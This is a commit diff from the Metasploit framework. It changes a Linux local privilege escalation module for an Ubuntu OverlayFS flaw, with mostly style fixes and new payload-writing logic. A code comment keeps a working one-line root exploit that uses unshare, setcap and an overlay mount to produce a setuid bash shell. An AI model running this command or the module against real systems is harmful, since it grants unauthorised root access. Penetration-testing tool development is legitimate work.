Rubocop changes and arch tracking for payload

gardnerapp · bwatters-r7 · commit 6e09722f67e6 · 2024-11-18T16:59:37.000-06:00
Update modules/exploits/linux/local/gameoverlay_privesc.rb

Co-authored-by: Brendan &lt;bwatters@rapid7.com&gt;

Rubocop changes
diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -112,15 +112,15 @@ def check
       end
     end
 
-    return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
+    return CheckCode::Safe('Target does not appear to be running a vunerable Ubuntu Distro or Kernel')
   end
 
   def exploit
-    pay_file = datastore['PayloadFilename']
+    datastore['PayloadFilename']
     pay_dir = datastore['WritableDir']
-    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += '/' unless pay_dir.ends_with? '/'
     pay_dir += Rex::Text.rand_text_alpha 10
-    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += '/' unless pay_dir.ends_with? '/'
     print_status "Creating directory to store payload: #{pay_dir}"
     mkdir pay_dir
     pay_dir = datastore['WritableDir']
@@ -141,20 +141,22 @@ def exploit
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"
-      mkdir "#{dir}"
+      mkdir dir.to_s
     end
 
-    pay = "#{pay_dir}#{pay_file}"
-
-    print_status "Writing payload: #{pay}"
-
-    write_file pay, generate_payload.generate
-
-    print_status 'Starting new namespace, and running exploit...'
+    if target.arch.first == ARCH_CMD
+      payload_cmd = "\\\"#{payload.encoded}\\\""
+    else
+      pay_file = datastore['PayloadFilename']
+      payload_path = "#{pay_dir}#{pay_file}"
+      print_status "Writing payload: #{payload_path}"
+      write_file(payload_path, generate_payload_exe)
+      payload_cmd = payload_path
+    end
 
     # g1vi original
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
-    
+
     # Exploit overlayfs vuln
     # Build the command
 
